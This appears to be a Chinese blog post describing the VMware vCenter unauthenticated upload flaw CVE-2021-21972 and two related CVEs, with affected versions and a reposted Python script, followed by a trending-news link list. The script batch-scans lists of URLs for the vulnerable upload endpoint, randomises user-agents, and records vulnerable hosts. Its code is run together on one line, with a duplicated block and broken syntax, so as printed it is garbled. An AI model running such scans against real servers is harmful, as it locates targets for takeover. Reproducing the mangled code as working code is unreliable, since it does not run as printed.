
Vmware vcenter未授權(quán)任意文件上傳
聲明:該文章由作者(葉辰)發(fā)表,轉(zhuǎn)載此文章須經(jīng)作者同意并請(qǐng)附上出處(0XUCN)及本頁(yè)鏈接。。
描述
2021年02月24日,某些平臺(tái)監(jiān)測(cè)到 Vmware官方發(fā)布了vCenter Server安全更新,修復(fù)了vSphereClient (HTML5)在vCenter Server插件vRealizeOperations(vROps)中的一個(gè)遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2021-21972)。VMware?vCenter Server是美國(guó)威睿(VMware)公司的一套服務(wù)器和虛擬化管理軟件。該軟件提供了一個(gè)用于管理VMware vCenter環(huán)境的集中式平臺(tái),可自動(dòng)實(shí)施和交付虛擬基礎(chǔ)架構(gòu)。攻擊者可通過(guò)訪問(wèn)web管理端向vCenter Server發(fā)送請(qǐng)求從而在操作系統(tǒng)上執(zhí)行任意命令或者上傳一個(gè)webshell到vcenter服務(wù)器的任意位置執(zhí)行
具有網(wǎng)絡(luò)訪問(wèn)端口443的惡意行為者可能會(huì)利用此問(wèn)題在托管vCenter Server的基礎(chǔ)操作系統(tǒng)上以不受限制的特權(quán)執(zhí)行命令。這會(huì)影響VMware vCenter Server(7.0 U1c之前的7.x,6.7 U3l之前的6.7和6.5 U3n之前的6.5)和VMware Cloud Foundation(4.2.3之前的4.x和3.10.1.2之前的3.x)。
此外,VMware還修復(fù)了VMware ESXi中一個(gè)重要的堆溢出漏洞(CVE-2021-21974)與VMware vSphere中的一個(gè)SSRF漏洞(CVE-2021-21973)。
據(jù)了解
在 CVE-2021-21972 VMware vCenter Server 遠(yuǎn)程代碼漏洞 中,攻擊者可直接通過(guò)443端口構(gòu)造惡意請(qǐng)求,執(zhí)行任意代碼,控制vCenter。
在 CVE-2021-21974 VMware ESXI 堆溢出漏洞 中,攻擊者可通過(guò)427端口構(gòu)造惡意請(qǐng)求,觸發(fā)OpenSLP服務(wù)中的堆溢出漏洞,并可能導(dǎo)致遠(yuǎn)程代碼執(zhí)行。
在 CVE-2021-21973 VMware vCenter Server SSRF漏洞 中,攻擊者可通過(guò)443端口發(fā)送惡意POST請(qǐng)求,發(fā)起內(nèi)網(wǎng)掃描,造成SSRF漏洞。
影響版本
VMware vCenter Server 7.0系列 < 7.0.U1c
VMware vCenter Server 6.7系列 < 6.7.U3l
VMware vCenter Server 6.5系列 < 6.5 U3n
VMware ESXi 7.0系列 < ESXi70U1c-17325551
VMware ESXi 6.7系列 < ESXi670-202102401-SG
VMware ESXi 6.5系列 < ESXi650-202102101-SG
驗(yàn)證POC
使用https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC腳本批量驗(yàn)證
import threadpool import random import requests import argparse import http.client import urllib3urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) http.client.HTTPConnection._http_vsn = 10 http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"def get_ua(): first_num = random.randint(55, 62) third_num = random.randint(0, 3200) fourth_num = random.randint(0, 140) os_type = [ '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)', '(Macintosh; Intel Mac OS X 10_12_6)' ] chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] ) return ua ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36', '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'] ) return ua def CVE_2021_21972(url): proxies = {"scoks5": "http://127.0.0.1:1081"} headers = { 'User-Agent': get_ua(), "Content-Type": "application/x-www-form-urlencoded" } targetUrl = url + TARGET_URI try: res = requests.get(targetUrl, headers=headers, timeout=15, verify=False, proxies=proxies) # proxies={'socks5': 'http://127.0.0.1:1081'}) # print(len(res.text)) if res.status_code == 405: print("[+] URL:{}--------存在CVE-2021-21972漏洞".format(url)) # print("[+] Command success result: " + res.text + "\n") with open("存在漏洞地址.txt", 'a') as fw: fw.write(url + '\n') else: print("[-] " + url + " 沒(méi)有發(fā)現(xiàn)CVE-2021-21972漏洞.\n") # except Exception as e: # print(e) except: print("[-] " + url + " Request ERROR.\n") def multithreading(filename, pools=5): works = [] with open(filename, "r") as f: for i in f: func_params = [i.rstrip("\n")] # func_params = [i] + [cmd] works.append((func_params, None)) pool = threadpool.ThreadPool(pools) reqs = threadpool.makeRequests(CVE_2021_21972, works) [pool.putRequest(req) for req in reqs] pool.wait()def main(): parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="Target URL; Example:http://ip:port") parser.add_argument("-f", "--file", help="Url File; Example:url.txt") # parser.add_argument("-c", "--cmd", help="Commands to be executed; ") args = parser.parse_args() url = args.url # cmd = args.cmd file_path = args.file if url != None and file_path ==None: CVE_2021_21972(url) elif url == None and file_path != None: multithreading(file_path, 10) # 默認(rèn)15線程if name == "main": main()
[超站]友情鏈接:
四季很好,只要有你,文娛排行榜:https://www.yaopaiming.com/
關(guān)注數(shù)據(jù)與安全,洞悉企業(yè)級(jí)服務(wù)市場(chǎng):https://www.ijiandao.com/
- 1 潮涌天山活力新 7904191
- 2 央視起底柯克之死 7808722
- 3 中產(chǎn)運(yùn)動(dòng)三件套又換了 7712104
- 4 多領(lǐng)域重點(diǎn)工程傳來(lái)好消息 7619241
- 5 持槍空降兵在孩子前一動(dòng)不敢動(dòng) 7520736
- 6 比亞迪李云飛回應(yīng)巴菲特清倉(cāng) 7425642
- 7 內(nèi)蒙古一地集中采集男性居民血樣 7328002
- 8 安踏市值蒸發(fā)125億港元 7236409
- 9 浙江大學(xué)教授被留置 持股市值31億 7135936
- 10 特朗普兒子模仿爸爸引哄堂大笑 7044843